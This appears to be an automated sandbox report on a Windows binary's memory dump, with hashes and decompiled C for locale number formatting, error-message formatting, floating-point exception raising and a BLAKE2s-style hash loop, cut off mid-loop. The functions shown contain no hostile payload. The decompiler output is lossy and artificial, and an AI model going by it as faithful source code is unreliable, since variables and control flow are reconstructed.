0x0028c4f4
0x0028c4f8
0x0028c4f9
0x0028c4fc
0x0028c4ff
0x0028c500
0x0028c503
0x0028c506
0x0028c509
0x0028c50c
0x0028c50c
0x0028c514
0x0028c51b
0x0028c51c
0x0028c51e
0x0028c520
0x0028c522
0x0028c525
0x0028c530
0x0028c530
0x0028c536
0x0028c536
0x0028c539
0x0028c53a
0x0028c53a
0x0028c530
0x0028c53e
0x0028c540
0x0028c542
0x0028c544
0x0028c544
0x0028c546
0x0028c54a
0x00000000
0x00000000
0x0028c54c
0x0028c54c
0x0028c54f
0x0028c551
0x00000000
0x00000000
0x00000000
0x0028c551
0x0028c544
0x0028c553
0x0028c55d
0x00000000
0x00000000
0x00000000
0x0028c268
0x0028c0f2
0x0028c0f2
0x0028c0f2
0x0028c0f5
0x0028c0f8
0x0028c0fb
0x0028c12c
0x0028c12e
0x0028c179
0x0028c17b
0x0028c182
0x0028c189
0x0028c18c
0x0028c18f
0x0028c195
0x0028c195
0x0028c196
0x0028c199
0x0028c1a0
0x0028c1a9
0x0028c1ae
0x0028c1b1
0x0028c1b6
0x0028c1b9
0x0028c1bb
0x0028c1c0
0x0028c1c3
0x0028c1c6
0x0028c1c6
0x0028c1c6
0x0028c1ca
0x0028c1cd
0x0028c1cd
0x0028c1d2
0x0028c1d2
0x0028c1dd
0x0028c1e8
0x0028c1e8
0x0028c1eb
0x0028c1f7
0x0028c1fc
0x0028c207
0x0028c209
0x0028c20b
0x0028c211
0x0028c216
0x0028c218
0x0028c21e
0x0028c130
0x0028c13c
0x0028c13c
0x0028c13f
0x0028c14f
0x0028c155
0x0028c15c
0x0028c15e
0x0028c166
0x0028c168
0x0028c16a
0x0028c16f
0x0028c172
0x0028c178
0x0028c178
0x0028c0fd
0x0028c100
0x0028c104
0x0028c10a
0x0028c119
0x0028c123
0x0028c12b
0x0028c12b
0x0028c0fb
0x0028c0d6
0x0028c0d9
0x0028c0df
0x0028c0df
0x0028c0c5
0x0028c0cb
0x0028c0cb

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e50bbf9e4776493f77c5540494787f02e85b2eba5f0c0a8ffb8a0a8bb63874f
Instruction ID: 58ef28e9e0df0649723dd000b6a1f6f9cf724c68ba501d21752449aed38b01aa
Opcode Fuzzy Hash: 0e50bbf9e4776493f77c5540494787f02e85b2eba5f0c0a8ffb8a0a8bb63874f
Instruction Fuzzy Hash: EB025B75E112199FDF14DFA8C8806ADB7F1FF88324F25816AE919E7384D730AA51CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00279D99, Relevance: 3.0, APIs: 2, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00279D99(intOrPtr _a4, intOrPtr _a8, short* _a12, int _a16) {
				short _v104;
				short _v304;
				short* _t23;
				int _t24;

				if( *0x29d610 == 0) {
					GetLocaleInfoW(0x400, 0xf,  &_v304, 0x64);
					 *0x2bde30 = _v304;
					 *0x2bde32 = 0;
					 *0x29d610 = 0x2bde30;
				}
				E0026F980(_a4, _a8,  &_v104, 0x32);
				_t23 = _a12;
				_t24 = _a16;
				 *_t23 = 0;
				GetNumberFormatW(0x400, 0,  &_v104, 0x29d600, _t23, _t24);
				 *((short*)(_t23 + _t24 * 2 - 2)) = 0;
				return 0;
			}

0x00279db1
0x00279dbf
0x00279dcc
0x00279dd4
0x00279dda
0x00279dda
0x00279df0
0x00279df5
0x00279dfa
0x00279e04
0x00279e0e
0x00279e16
0x00279e21

APIs

GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00279DBF
GetNumberFormatW.KERNEL32(00000400,00000000,?,0029D600,?,?), ref: 00279E0E

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: d775ae9afaf32455b108bd17c126ebd14dfec0be7c29c56e4be001c2685659f0
Instruction ID: 048f81315169de1c6c950a55d7af0fc620d9cc964d546700b910f0b78492f5de
Opcode Fuzzy Hash: d775ae9afaf32455b108bd17c126ebd14dfec0be7c29c56e4be001c2685659f0
Instruction Fuzzy Hash: 1D015E35510208BBDB109FA4EC49FAB77BCEF09720F008522FA0897151E371A9248BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00266D06, Relevance: 3.0, APIs: 2, Instructions: 17
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00266D06(WCHAR* _a4, long _a8) {
				long _t3;
				signed int _t5;

				_t3 = GetLastError();
				if(_t3 == 0) {
					return 0;
				}
				_t5 = FormatMessageW(0x1200, 0, _t3, 0x400, _a4, _a8, 0);
				asm("sbb eax, eax");
				return  ~( ~_t5);
			}

0x00266d06
0x00266d0e
0x00000000
0x00266d35
0x00266d27
0x00266d2f
0x00000000

APIs

GetLastError.KERNEL32(00270DE0,?,00000200), ref: 00266D06
FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00266D27

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 6fc2ee6c87b6ca7b0cf14db4d1457739e2d5c6c11941624ba3eba3265923d8c1
Instruction ID: c616559df11858ad5297df364f3ac1df3e0e8f5446645f4754f082f3668fc0a9
Opcode Fuzzy Hash: 6fc2ee6c87b6ca7b0cf14db4d1457739e2d5c6c11941624ba3eba3265923d8c1
Instruction Fuzzy Hash: 1FD0C9713E8302FEFA110E709C0EF2A7795B766B82F248905B356E90E0D6B09068D629

Uniqueness

Uniqueness Score: -1.00%

Function 00290654, Relevance: 1.8, APIs: 1, Instructions: 269
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00290654(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
				signed int _t172;
				signed int _t175;
				signed int _t178;
				signed int* _t179;
				signed int _t195;
				signed int _t199;
				signed int _t202;
				void* _t203;
				void* _t206;
				signed int _t209;
				void* _t210;
				signed int _t225;
				unsigned int* _t240;
				signed char _t242;
				signed int* _t250;
				unsigned int* _t256;
				signed int* _t257;
				signed char _t259;
				long _t262;
				signed int* _t265;

				 *(_a4 + 4) = 0;
				_t262 = 0xc000000d;
				 *(_a4 + 8) = 0;
				 *(_a4 + 0xc) = 0;
				_t242 = _a12;
				if((_t242 & 0x00000010) != 0) {
					_t262 = 0xc000008f;
					 *(_a4 + 4) =  *(_a4 + 4) | 1;
				}
				if((_t242 & 0x00000002) != 0) {
					_t262 = 0xc0000093;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
				}
				if((_t242 & 0x00000001) != 0) {
					_t262 = 0xc0000091;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
				}
				if((_t242 & 0x00000004) != 0) {
					_t262 = 0xc000008e;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
				}
				if((_t242 & 0x00000008) != 0) {
					_t262 = 0xc0000090;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
				}
				_t265 = _a8;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 << 4) ^  *(_a4 + 8)) & 0x00000010;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 +  *_t265) ^  *(_a4 + 8)) & 0x00000008;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 1) ^  *(_a4 + 8)) & 0x00000004;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 3) ^  *(_a4 + 8)) & 0x00000002;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 5) ^  *(_a4 + 8)) & 1;
				_t259 = E0028DFB6(_a4);
				if((_t259 & 0x00000001) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
				}
				if((_t259 & 0x00000004) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
				}
				if((_t259 & 0x00000008) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
				}
				if((_t259 & 0x00000010) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
				}
				if((_t259 & 0x00000020) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
				}
				_t172 =  *_t265 & 0x00000c00;
				if(_t172 == 0) {
					 *_a4 =  *_a4 & 0xfffffffc;
				} else {
					if(_t172 == 0x400) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffd | 1;
						L26:
						 *_t257 = _t225;
						L29:
						_t175 =  *_t265 & 0x00000300;
						if(_t175 == 0) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffeb | 0x00000008;
							L35:
							 *_t250 = _t178;
							L36:
							_t179 = _a4;
							_t254 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
							if(_a28 == 0) {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
								 *((long long*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t254 = _a4;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
								 *(_a4 + 0x50) =  *_t240;
							} else {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
								 *(_a4 + 0x50) =  *_t240;
							}
							E0028DF1C(_t254);
							RaiseException(_t262, 0, 1,  &_a4);
							_t256 = _a4;
							if((_t256[2] & 0x00000010) != 0) {
								 *_t265 =  *_t265 & 0xfffffffe;
							}
							if((_t256[2] & 0x00000008) != 0) {
								 *_t265 =  *_t265 & 0xfffffffb;
							}
							if((_t256[2] & 0x00000004) != 0) {
								 *_t265 =  *_t265 & 0xfffffff7;
							}
							if((_t256[2] & 0x00000002) != 0) {
								 *_t265 =  *_t265 & 0xffffffef;
							}
							if((_t256[2] & 0x00000001) != 0) {
								 *_t265 =  *_t265 & 0xffffffdf;
							}
							_t195 =  *_t256 & 0x00000003;
							if(_t195 == 0) {
								 *_t265 =  *_t265 & 0xfffff3ff;
							} else {
								_t206 = _t195 - 1;
								if(_t206 == 0) {
									_t209 =  *_t265 & 0xfffff7ff | 0x00000400;
									L55:
									 *_t265 = _t209;
									L58:
									_t199 =  *_t256 >> 0x00000002 & 0x00000007;
									if(_t199 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000300;
										L64:
										 *_t265 = _t202;
										L65:
										if(_a28 == 0) {
											 *_t240 = _t256[0x14];
										} else {
											 *_t240 = _t256[0x14];
										}
										return _t202;
									}
									_t203 = _t199 - 1;
									if(_t203 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000200;
										goto L64;
									}
									_t202 = _t203 - 1;
									if(_t202 == 0) {
										 *_t265 =  *_t265 & 0xfffff3ff;
									}
									goto L65;
								}
								_t210 = _t206 - 1;
								if(_t210 == 0) {
									_t209 =  *_t265 & 0xfffffbff | 0x00000800;
									goto L55;
								}
								if(_t210 == 1) {
									 *_t265 =  *_t265 | 0x00000c00;
								}
							}
							goto L58;
						}
						if(_t175 == 0x200) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffe7 | 0x00000004;
							goto L35;
						}
						if(_t175 == 0x300) {
							 *_a4 =  *_a4 & 0xffffffe3;
						}
						goto L36;
					}
					if(_t172 == 0x800) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffe | 0x00000002;
						goto L26;
					}
					if(_t172 == 0xc00) {
						 *_a4 =  *_a4 | 0x00000003;
					}
				}
			}

0x00290662
0x00290669
0x0029066e
0x00290674
0x00290677
0x0029067d
0x00290682
0x00290687
0x00290687
0x0029068d
0x00290692
0x00290697
0x00290697
0x0029069e
0x002906a3
0x002906a8
0x002906a8
0x002906af
0x002906b4
0x002906b9
0x002906b9
0x002906c0
0x002906c5
0x002906ca
0x002906ca
0x002906d2
0x002906e2
0x002906f4
0x00290706
0x00290719
0x0029072b
0x00290733
0x00290738
0x0029073d
0x0029073d
0x00290744
0x00290749
0x00290749
0x00290750
0x00290755
0x00290755
0x0029075c
0x00290761
0x00290761
0x00290768
0x0029076d
0x0029076d
0x00290777
0x00290779
0x002907b3
0x0029077b
0x00290780
0x002907a4
0x002907ac
0x002907a0
0x002907a0
0x002907b6
0x002907bd
0x002907bf
0x002907e1
0x002907e9
0x002907ec
0x002907ec
0x002907ee
0x002907ee
0x002907f9
0x002907ff
0x00290804
0x0029080b
0x00290845
0x00290850
0x00290856
0x00290859
0x0029085c
0x00290868
0x00290870
0x0029080d
0x00290810
0x0029081c
0x00290822
0x00290828
0x0029082b
0x00290834
0x00290834
0x00290873
0x00290881
0x00290887
0x0029088e
0x00290890
0x00290890
0x00290897
0x00290899
0x00290899
0x002908a0
0x002908a2
0x002908a2
0x002908a9
0x002908ab
0x002908ab
0x002908b2
0x002908b4
0x002908b4
0x002908c1
0x002908c4
0x002908fb
0x002908c6
0x002908c6
0x002908c9
0x002908f4
0x002908e9
0x002908e9
0x002908fd
0x00290905
0x00290908
0x00290927
0x0029092c
0x0029092c
0x0029092e
0x00290933
0x0029093f
0x00290935
0x00290938
0x00290938
0x00290944
0x00290944
0x0029090a
0x0029090d
0x0029091c
0x00000000
0x0029091c
0x0029090f
0x00290912
0x00290914
0x00290914
0x00000000
0x00290912
0x002908cb
0x002908ce
0x002908e4
0x00000000
0x002908e4
0x002908d3
0x002908d5
0x002908d5
0x002908d3
0x00000000
0x002908c4
0x002907c6
0x002907d4
0x002907dc
0x00000000
0x002907dc
0x002907ca
0x002907cf
0x002907cf
0x00000000
0x002907ca
0x00290787
0x00290795
0x0029079d
0x00000000
0x0029079d
0x0029078b
0x00290790
0x00290790
0x0029078b

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0029064F,?,?,00000008,?,?,002902EF,00000000), ref: 00290881

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: bd25fff3bdd65a892498a48a1a5e101b58b312a8ff68f2075f3963b12e82965a
Instruction ID: 842dae5da452d89ceb6e5f1463374ea12fe5a99c91acf44728e8c01d5aa42f56
Opcode Fuzzy Hash: bd25fff3bdd65a892498a48a1a5e101b58b312a8ff68f2075f3963b12e82965a
Instruction Fuzzy Hash: 0FB15B35620609DFDB15CF28C4CABA57BE0FF44364F258658E999CF2A1C335E9A1CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00263EAD, Relevance: 1.6, Strings: 1, Instructions: 332
COMMONCrypto

Download Yara Rule

C-Code - Quality: 81%

			E00263EAD() {
				void* _t230;
				signed int* _t231;
				intOrPtr _t240;
				signed int _t245;
				intOrPtr _t246;
				signed int _t257;
				intOrPtr _t258;
				signed int _t269;
				intOrPtr _t270;
				signed int _t275;
				signed int _t280;
				signed int _t285;
				signed int _t290;
				signed int _t295;
				intOrPtr _t296;
				signed int _t301;
				intOrPtr _t302;
				signed int _t307;
				intOrPtr _t308;
				signed int _t313;
				intOrPtr _t314;
				signed int _t319;
				signed int _t324;
				signed int _t329;
				signed int _t333;
				signed int _t334;
				signed int _t336;
				signed int _t337;
				signed int _t338;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				signed int _t348;
				signed int _t350;
				signed int _t351;
				signed int _t353;
				signed int _t355;
				signed int _t356;
				signed int _t358;
				signed int _t360;
				signed int _t362;
				signed int _t363;
				signed int _t365;
				signed int _t366;
				signed int _t368;
				signed int _t369;
				signed int _t371;
				signed int _t372;
				signed int _t374;
				signed int _t375;
				intOrPtr _t376;
				intOrPtr _t377;
				signed int _t379;
				signed int _t381;
				intOrPtr _t383;
				signed int _t385;
				signed int _t386;
				signed int _t388;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				intOrPtr _t396;
				signed int _t398;
				intOrPtr _t399;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t412;
				signed int _t414;
				signed int _t418;
				signed int _t420;
				signed int _t422;
				signed int _t423;
				signed int _t425;
				signed int _t427;
				signed int _t429;
				intOrPtr _t431;
				signed int _t433;
				intOrPtr _t434;
				void* _t435;
				void* _t436;
				void* _t437;

				_t377 =  *((intOrPtr*)(_t435 + 0xc0));
				_t342 = 0x10;
				 *((intOrPtr*)(_t435 + 0x18)) = 0x3c6ef372;
				memcpy(_t435 + 0x8c,  *(_t435 + 0xd0), _t342 << 2);
				_t436 = _t435 + 0xc;
				_push(8);
				_t230 = memcpy(_t436 + 0x4c,  *(_t377 + 0xf4), 0 << 2);
				_t437 = _t436 + 0xc;
				_t418 =  *_t230 ^ 0x510e527f;
				_t231 =  *(_t377 + 0xfc);
				_t407 =  *(_t230 + 4) ^ 0x9b05688c;
				_t334 =  *(_t437 + 0x64);
				 *(_t437 + 0x28) = 0x6a09e667;
				 *(_t437 + 0x30) = 0xbb67ae85;
				_t379 =  *_t231 ^ 0x1f83d9ab;
				_t348 =  *(_t437 + 0x5c);
				 *(_t437 + 0x44) = _t231[1] ^ 0x5be0cd19;
				 *(_t437 + 0x3c) =  *(_t437 + 0x68);
				 *(_t437 + 0x1c) =  *(_t437 + 0x60);
				 *(_t437 + 0x2c) =  *(_t437 + 0x58);
				 *(_t437 + 0x38) =  *(_t437 + 0x54);
				 *(_t437 + 0x20) =  *(_t437 + 0x50);
				 *((intOrPtr*)(_t437 + 0x10)) = 0;
				 *((intOrPtr*)(_t437 + 0x48)) = 0;
				_t427 =  *(_t437 + 0x44);
				 *(_t437 + 0x14) =  *(_t437 + 0x4c);
				_t240 =  *((intOrPtr*)(_t437 + 0x10));
				 *(_t437 + 0x24) = 0xa54ff53a;
				 *(_t437 + 0x40) = _t334;
				 *(_t437 + 0x34) = _t348;
				do {
					_t37 = _t240 + 0x2923b0; // 0x3020100
					_t350 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t37 & 0x000000ff) * 4)) + _t348;
					 *(_t437 + 0x14) = _t350;
					_t351 = _t350 ^ _t418;
					asm("rol ecx, 0x10");
					_t245 =  *(_t437 + 0x28) + _t351;
					_t420 =  *(_t437 + 0x34) ^ _t245;
					 *(_t437 + 0x28) = _t245;
					_t246 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror esi, 0xc");
					 *(_t437 + 0x34) = _t420;
					_t48 = _t246 + 0x2923b1; // 0x4030201
					_t422 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t48 & 0x000000ff) * 4)) + _t420;
					 *(_t437 + 0x14) = _t422;
					_t423 = _t422 ^ _t351;
					asm("ror esi, 0x8");
					_t353 =  *(_t437 + 0x28) + _t423;
					 *(_t437 + 0x28) = _t353;
					asm("ror eax, 0x7");
					 *(_t437 + 0x34) =  *(_t437 + 0x34) ^ _t353;
					_t60 =  *((intOrPtr*)(_t437 + 0x10)) + 0x2923b2; // 0x5040302
					_t355 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t60 & 0x000000ff) * 4)) +  *(_t437 + 0x1c);
					 *(_t437 + 0x20) = _t355;
					_t356 = _t355 ^ _t407;
					asm("rol ecx, 0x10");
					_t257 =  *(_t437 + 0x30) + _t356;
					_t409 =  *(_t437 + 0x1c) ^ _t257;
					 *(_t437 + 0x30) = _t257;
					_t258 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edi, 0xc");
					 *(_t437 + 0x1c) = _t409;
					_t71 = _t258 + 0x2923b3; // 0x6050403
					_t411 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t71 & 0x000000ff) * 4)) + _t409;
					 *(_t437 + 0x20) = _t411;
					_t412 = _t411 ^ _t356;
					asm("ror edi, 0x8");
					_t358 =  *(_t437 + 0x30) + _t412;
					 *(_t437 + 0x30) = _t358;
					asm("ror eax, 0x7");
					 *(_t437 + 0x1c) =  *(_t437 + 0x1c) ^ _t358;
					_t82 =  *((intOrPtr*)(_t437 + 0x10)) + 0x2923b4; // 0x7060504
					_t336 =  *(_t437 + 0x38) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t82 & 0x000000ff) * 4)) + _t334;
					_t360 = _t336 ^ _t379;
					asm("rol ecx, 0x10");
					_t269 =  *(_t437 + 0x18) + _t360;
					_t381 =  *(_t437 + 0x40) ^ _t269;
					 *(_t437 + 0x18) = _t269;
					_t270 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0xc");
					_t91 = _t270 + 0x2923b5; // 0x8070605
					_t337 = _t336 +  *((intOrPtr*)(_t437 + 0x8c + ( *_t91 & 0x000000ff) * 4)) + _t381;
					 *(_t437 + 0x38) = _t337;
					_t338 = _t337 ^ _t360;
					asm("ror ebx, 0x8");
					_t275 =  *(_t437 + 0x18) + _t338;
					 *(_t437 + 0x18) = _t275;
					asm("ror edx, 0x7");
					 *(_t437 + 0x40) = _t381 ^ _t275;
					_t383 =  *((intOrPtr*)(_t437 + 0x10));
					_t101 = _t383 + 0x2923b6; // 0x9080706
					_t362 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t101 & 0x000000ff) * 4)) +  *(_t437 + 0x3c);
					 *(_t437 + 0x2c) = _t362;
					_t363 = _t362 ^ _t427;
					asm("rol ecx, 0x10");
					_t280 =  *(_t437 + 0x24) + _t363;
					_t429 =  *(_t437 + 0x3c) ^ _t280;
					 *(_t437 + 0x24) = _t280;
					_t110 = _t383 + 0x2923b7; // 0xa090807
					asm("ror ebp, 0xc");
					_t385 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t110 & 0x000000ff) * 4)) + _t429;
					 *(_t437 + 0x2c) = _t385;
					_t386 = _t385 ^ _t363;
					asm("ror edx, 0x8");
					_t285 =  *(_t437 + 0x24) + _t386;
					 *(_t437 + 0x24) = _t285;
					asm("ror ebp, 0x7");
					 *(_t437 + 0x3c) = _t429 ^ _t285;
					_t431 =  *((intOrPtr*)(_t437 + 0x10));
					_t121 = _t431 + 0x2923b8; // 0xb0a0908
					_t365 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t121 & 0x000000ff) * 4)) +  *(_t437 + 0x1c);
					 *(_t437 + 0x14) = _t365;
					_t366 = _t365 ^ _t386;
					asm("rol ecx, 0x10");
					_t290 =  *(_t437 + 0x18) + _t366;
					_t388 =  *(_t437 + 0x1c) ^ _t290;
					 *(_t437 + 0x18) = _t290;
					_t130 = _t431 + 0x2923b9; // 0xc0b0a09
					asm("ror edx, 0xc");
					_t433 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t130 & 0x000000ff) * 4)) + _t388;
					 *(_t437 + 0x14) = _t433;
					 *(_t437 + 0x4c) = _t433;
					_t427 = _t433 ^ _t366;
					asm("ror ebp, 0x8");
					_t295 =  *(_t437 + 0x18) + _t427;
					_t389 = _t388 ^ _t295;
					 *(_t437 + 0x18) = _t295;
					 *(_t437 + 0x74) = _t295;
					_t296 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0x7");
					 *(_t437 + 0x1c) = _t389;
					 *(_t437 + 0x60) = _t389;
					_t144 = _t296 + 0x2923ba; // 0xd0c0b0a
					_t390 =  *(_t437 + 0x40);
					_t368 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t144 & 0x000000ff) * 4)) + _t390;
					 *(_t437 + 0x20) = _t368;
					_t369 = _t368 ^ _t423;
					asm("rol ecx, 0x10");
					_t301 =  *(_t437 + 0x24) + _t369;
					_t391 = _t390 ^ _t301;
					 *(_t437 + 0x24) = _t301;
					_t302 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0xc");
					_t154 = _t302 + 0x2923bb; // 0xe0d0c0b
					_t425 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t154 & 0x000000ff) * 4)) + _t391;
					 *(_t437 + 0x20) = _t425;
					 *(_t437 + 0x50) = _t425;
					_t418 = _t425 ^ _t369;
					asm("ror esi, 0x8");
					_t307 =  *(_t437 + 0x24) + _t418;
					_t392 = _t391 ^ _t307;
					 *(_t437 + 0x24) = _t307;
					 *(_t437 + 0x78) = _t307;
					_t308 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0x7");
					 *(_t437 + 0x40) = _t392;
					 *(_t437 + 0x64) = _t392;
					_t167 = _t308 + 0x2923bc; // 0xf0e0d0c
					_t393 =  *(_t437 + 0x3c);
					_t371 =  *(_t437 + 0x38) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t167 & 0x000000ff) * 4)) + _t393;
					 *(_t437 + 0x38) = _t371;
					_t372 = _t371 ^ _t412;
					asm("rol ecx, 0x10");
					_t313 =  *(_t437 + 0x28) + _t372;
					_t394 = _t393 ^ _t313;
					 *(_t437 + 0x28) = _t313;
					_t314 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0xc");
					_t177 = _t314 + 0x2923bd; // 0xe0f0e0d
					_t414 =  *(_t437 + 0x38) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t177 & 0x000000ff) * 4)) + _t394;
					 *(_t437 + 0x38) = _t414;
					 *(_t437 + 0x54) = _t414;
					_t407 = _t414 ^ _t372;
					asm("ror edi, 0x8");
					_t319 =  *(_t437 + 0x28) + _t407;
					_t395 = _t394 ^ _t319;
					 *(_t437 + 0x28) = _t319;
					asm("ror edx, 0x7");
					 *(_t437 + 0x3c) = _t395;
					 *(_t437 + 0x68) = _t395;
					_t396 =  *((intOrPtr*)(_t437 + 0x10));
					 *(_t437 + 0x6c) = _t319;
					_t190 = _t396 + 0x2923be; // 0xa0e0f0e
					_t374 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t190 & 0x000000ff) * 4)) +  *(_t437 + 0x34);
					 *(_t437 + 0x2c) = _t374;
					_t375 = _t374 ^ _t338;
					asm("rol ecx, 0x10");
					_t324 =  *(_t437 + 0x30) + _t375;
					_t340 =  *(_t437 + 0x34) ^ _t324;
					 *(_t437 + 0x30) = _t324;
					_t199 = _t396 + 0x2923bf; // 0x40a0e0f
					asm("ror ebx, 0xc");
					_t398 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t199 & 0x000000ff) * 4)) + _t340;
					 *(_t437 + 0x2c) = _t398;
					 *(_t437 + 0x58) = _t398;
					_t379 = _t398 ^ _t375;
					asm("ror edx, 0x8");
					_t329 =  *(_t437 + 0x30) + _t379;
					_t341 = _t340 ^ _t329;
					 *(_t437 + 0x30) = _t329;
					 *(_t437 + 0x70) = _t329;
					asm("ror ebx, 0x7");
					_t240 =  *((intOrPtr*)(_t437 + 0x10)) + 0x10;
					 *(_t437 + 0x34) = _t341;
					_t348 =  *(_t437 + 0x34);
					 *(_t437 + 0x5c) = _t341;
					_t334 =  *(_t437 + 0x40);
